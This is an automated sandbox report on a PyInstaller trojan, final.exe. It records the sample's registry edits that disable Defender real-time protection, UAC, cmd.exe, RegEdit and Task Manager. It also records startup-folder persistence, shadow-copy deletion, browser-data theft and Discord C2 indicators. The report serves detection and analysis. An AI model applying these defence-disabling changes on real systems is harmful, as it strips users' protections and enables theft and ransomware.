Malware Analysis Report

2025-03-15 03:42

Sample ID 250113-nmm9kaspgm
Target final.exe
SHA256 d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12
Tags
pyinstaller defense_evasion discovery evasion execution exploit impact persistence privilege_escalation ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12

Threat Level: Known bad

The file final.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller defense_evasion discovery evasion execution exploit impact persistence privilege_escalation ransomware spyware stealer trojan

UAC bypass

Modifies Windows Defender Real-time Protection settings

Deletes shadow copies

Command and Scripting Interpreter: PowerShell

Disables RegEdit via registry modification

Drops file in Drivers directory

Disables Task Manager via registry modification

Possible privilege escalation attempt

Disables cmd.exe use via registry modification

Loads dropped DLL

Drops startup file

Modifies file permissions

Reads user/profile data of web browsers

Impair Defenses: Safe Mode Boot

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Looks up external IP address via web service

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Unsigned PE

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

System policy modification

Checks SCSI registry key(s)

Kills process with taskkill

Uses Task Scheduler COM API

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Modifies registry key

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-01-13 11:31

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral14

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x64-20240910-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

debian9-mipsbe-20240418-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

debian9-mipsel-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x86-arm-20240624-en

Max time network

3s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x64-arm64-20240910-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

debian9-mipsel-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:55

Platform

win7-20240903-en

Max time kernel

839s

Max time network

841s

Command Line

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 2976 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 2976 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe

Processes

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29762\gevent-24.11.1.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\Users\Admin\AppData\Local\Temp\_MEI29762\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Analysis: behavioral3

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x86-arm-20240624-en

Max time network

6s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x64-20240624-en

Max time network

4s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

debian9-mipsbe-20240418-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

win7-20240903-en

Max time network

0s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

macos-20241106-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

android-x64-arm64-20240910-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

macos-20241101-en

Max time network

1s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

debian9-armhf-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

win10v2004-20241007-en

Max time kernel

0s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 20.44.239.154:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:55

Platform

win10v2004-20241007-en

Max time kernel

900s

Max time network

892s

Command Line

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\$Sys-Manager\systemservice92.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\$Sys-Manager\systemservice92.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffpxcvfkbk48llsu.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffpxcvfkbk48llsu.exe C:\$Sys-Manager\systemservice92.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal C:\$Sys-Manager\systemservice92.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\$Sys-Manager\desktop.ini C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000041ba55ff39bb976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000041ba55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090041ba55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d41ba55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000041ba55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
